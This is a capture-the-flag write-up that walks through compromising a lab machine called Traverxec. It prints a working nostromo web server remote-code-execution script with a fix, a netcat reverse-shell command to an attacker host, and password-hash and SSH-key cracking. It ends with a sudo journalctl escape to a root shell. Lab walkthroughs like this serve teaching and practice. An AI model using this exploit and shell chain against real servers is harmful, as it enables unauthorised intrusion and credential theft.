Menu

Traverxec

Always stay close to what keeps you feeling alive!

Traverxec is an easy difficulty machine running Linux. It tests your knowledge in Basic enumeration and privelege escalation using a common exploit and GTFOBin.

Be sure to checkout the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan traverxec.htb -oX nmap.xml Grabbing ports... Ports grabbed! Scanning... Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 17:15 PST Nmap scan report for traverxec.htb ( 10.10.10.165 ) Host is up ( 0.22s latency ) . PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 ( protocol 2.0 ) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c ( RSA ) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc ( ECDSA ) |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce ( ED25519 ) 80/tcp open http nostromo 1.9.6 |_http-server-header: nostromo 1.9.6 |_http-title: TRAVERXEC Service Info: OS: Linux ; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address ( 1 host up ) scanned in 14.45 seconds

We see port 80 open and straight away we notice nostromo 1.9.6 .

Using searchsploit we find some vulns:

searchsploit nostromo --------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | ( /usr/share/exploitdb/ ) --------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Nostromo - Directory Traversal Remote Command Execution ( Metasploit ) | exploits/multiple/remote/47573.rb nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh --------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result

We will take a look at 35466.sh script to see what that’s about. Searchsploit scripts notoriously have different unicode formats and whitespace from other operating systems and what not that cause the script to fail or run incorrectly. Not only that but they generally have comments that don’t use comment syntax of the language it is written in. So open up the file with your preferred editor and just take what you need.

We end up with the following:

nano nhttpd.sh #!/bin/sh ###################################### # # # RedTeam Pentesting GmbH # # kontakt@redteam-pentesting.de # # http://www.redteam-pentesting.de # # # ###################################### if [ $# -lt 3 ] ; then echo "Usage: $( basename $0 ) HOST PORT COMMAND..." exit 2 fi HOST = " $1 " PORT = " $2 " shift 2 ( \ echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r

' ; \ echo -n -e 'Content-Length: 1\r

\r

echo

echo

' ; \ echo " $@ 2>&1" \ ) | nc " $HOST " " $PORT " \ | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

Upon running this script as is it runs without errors but nothing happens. At closer inspection we see the url encode ..%2f..%2f..%2 which equates to ../../../ our directory traversal.

Changing this to a carriage return instead, such as .%0d./.%0d./.%0d./.%0d. and changing #!/bin/sh to #!/bin/bash fixes the issue:

./nhttpd.sh traverxec.htb 80 id uid = 33 ( www-data ) gid = 33 ( www-data ) groups = 33 ( www-data )

Now lets connect with netcat .

First setup our netcat listener:

nc -lvp 1234

Then we use our local script to issue our netcat command remotely on traverxec :

./nhttpd.sh traverxec.htb 80 nohup nc <attacker-ip> 1234 -e /bin/bash &

From here we can upgrade the shell!

Ok so we are in as user www-data and our working directory is /usr/bin .

First things first let’s see what other users we have on this machine. Taking a look in /home we see a user called david but we see that we do not have permissions to access their home directory.

Htpasswd

Next we will do a search for hidden files to see if we uncover anything:

www-data@traverxec:/usr/bin $ find / -name ".*" -ls 2>&1 | grep -v "Permission denied" .... SNIP .... .... SNIP .... .... SNIP .... 11005 4 -rw-r--r-- 1 root bin 41 Oct 25 15:20 /var/nostromo/conf/.htpasswd

Having a look inside this file we find a hash:

www-data@traverxec:/usr/bin $ cat /var/nostromo/conf/.htpasswd david: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ /

Let’s take this over to our attacker machine and see if we can crack it:

john htpasswd.txt --wordlist = /root/wordlists/passwords.txt Warning: detected hash type "md5crypt" , but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash ( md5crypt, crypt ( 3 ) $1$ ( and variants ) [ MD5 256/256 AVX2 8x3] ) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Now....4me ( ? ) 1g 0:00:14:48 DONE ( 2019-12-05 00:05 ) 0.001125g/s 312184p/s 312184c/s 312184C/s NuGiEr37..Novara Use the "--show" option to display all of the cracked passwords reliably Session completed

Ok so we have a password. Now let’s go see where we can use it.

It doesn’t work with ssh or su david so we need to know more about how nostromo works and where the .htpasswd is being used.

Doing some research about nostromo it seems that the folder that stores the configuration files is /var/nostromo/conf where we found our .htpaswd . Let’s take a look in this directory and see if there is anything interesting:

www-data@traverxec:/usr/bin $ ls -l /var/nostromo/conf total 8 -rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes -rw-r--r-- 1 root bin 498 Oct 25 15:20 nhttpd.conf

We need to know more about how nostromo ’s configuration works so we will open up the manpage with man nhttpd so we have a reference for the configuration file.

Now let’s have a look at how things are set up:

www-data@traverxec:/var/nostromo/conf $ cat nhttpd.conf # MAIN [MANDATORY] servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html # LOGS [OPTIONAL] logpid logs/nhttpd.pid # SETUID [RECOMMENDED] user www-data # BASIC AUTHENTICATION [OPTIONAL] htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd # ALIASES [OPTIONAL] /icons /var/nostromo/icons # HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www

Looking at the config a couple of things stand out. We have the Basic Authentication set up and can see that the password hash is located at /var/nostromo/conf/.htpasswd of which we have already cracked.

The other thing that stands out is that there is a section called HOMEDIRS . I am assuming this is similar to apache.

On reviewing the manual we see that homedirs sets up a path on the webserver to any users home directories found in /home . We see that to access a users home directory from the webserver we need to append the username to the url such as http://traverxec.htb/~david .

In going to this page we are presented with a message:

Looking further in to the HOMEDIRS config within the manual we also see that one can restrict access to a sub folder rather than giving access to the users whole home directory. This has been set to public_www .

Let’s see if we can take a peak in this directory:

www-data@traverxec:/var/nostromo/conf $ ls -l /home/david/public_www total 8 -rw-r--r-- 1 david david 402 Oct 25 15:45 index.html drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

And there is our protected folder it seems. Let’s go see if the password works with the username david at the web address http://traverxec.htb/~david/protected-file-area :

Yep we get access and get a directory index with the file backup-ssh-identity-files.tgz . That will be our ssh access, w00t!

SSH Identity

We download the file and unzip it and take a look in /home/david/.ssh . Remember, dot files and folders are hidden so when you look in the extracted folders it will look like there is nothing there. Use the command ls -la to show them.

Let’s try using our new found ssh key :

ssh -i .ssh/id_rsa david@traverxec.htb Enter passphrase for key '.ssh/id_rsa' :

We get asked for a passphrase and our password we found is a no go. Looks like we have some more cracking to do!

User

Fireup ssh2john and convert the key to a readable format for John The Ripper:

python ssh2john.py id_rsa > id_rsa.hash

Now let’s crack the hash with John The Ripper:

john --wordlist = /root/wordlists/passwords.txt id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash ( SSH [ RSA/DSA/EC/OPENSSH ( SSH private keys ) 32/64] ) Cost 1 ( KDF/cipher [ 0 = MD5/AES 1 = MD5/3DES 2 = Bcrypt/AES] ) is 0 for all loaded hashes Cost 2 ( iteration count ) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status hu....er ( /root/Documents/traverxec/backup-ssh-identity-files/home/david/.ssh/id_rsa ) 74g 0:00:01:13 DONE ( 2019-12-05 04:12 ) 1.009g/s 4131Kp/s 4131Kc/s 4131KC/s 233091..hielox Session completed

Now that we have gotten our ssh key passphrase let’s try logging in again:

ssh -i id_rsa david@traverxec.htb Enter passphrase for key 'id_rsa' : Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 david@traverxec:~ $ cat user.txt 7db0b48469....50d9782f3d

And there were are. We have our user flag!

Now let’s move on to root .

Root

When we take a look in davids home directory we see a script in the bin folder called server-stats.sh :

david@traverxec:~/bin $ cat server-stats.sh #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: ` /usr/bin/uptime ` " echo " " echo "Open nhttpd sockets: ` /usr/bin/ss -H sport = 80 | /usr/bin/wc -l ` " echo "Files in the docroot: ` /usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l ` " echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo .service | /usr/bin/cat

The last line is using sudo . This will most likley be our exploit.

The journalctl command is a gtfobin because it uses less which can used to grab a shell.

Let’s have a run of the command that is on the last line. The pipe ( | ) and execution of the cat command is pointless so let’s get rid of that:

david@traverxec:~/bin $ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo .service -- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:48:54 EST. -- Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can 't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory Dec 06 08:08:28 traverxec nhttpd[457]: started Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max) Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server. Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=validate

Ok so here we see a problem. We like to see what we are doing so we always have our terminal windows maximized. Because of this the command runs with less but then exits.

Making the terminal window smaller and running the command again so less can do it’s thing does the trick.

When less shows lines 1-6/6 (END) type in !/bin/bash to grab the root shell:

david@traverxec:~/bin $ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo .service -- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:53:42 EST. -- Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can 't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after Dec 06 08:08:28 traverxec nhttpd[457]: started Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max) Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server. Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND= lines 1-6/6 (END) !/bin/bash root@traverxec:/home/david/bin# cat /root/root.txt 9aa36a6d76....78f6e0d906

Now wasn’t that fun? Enjoy :)

Conclusion

This machine was a good learning curve in making sure you research the services that you are trying to exploit. Using what we had at hand on the machine we were able to understand what paths we needed to take both for user and root. We should never underestimate the importance of active research.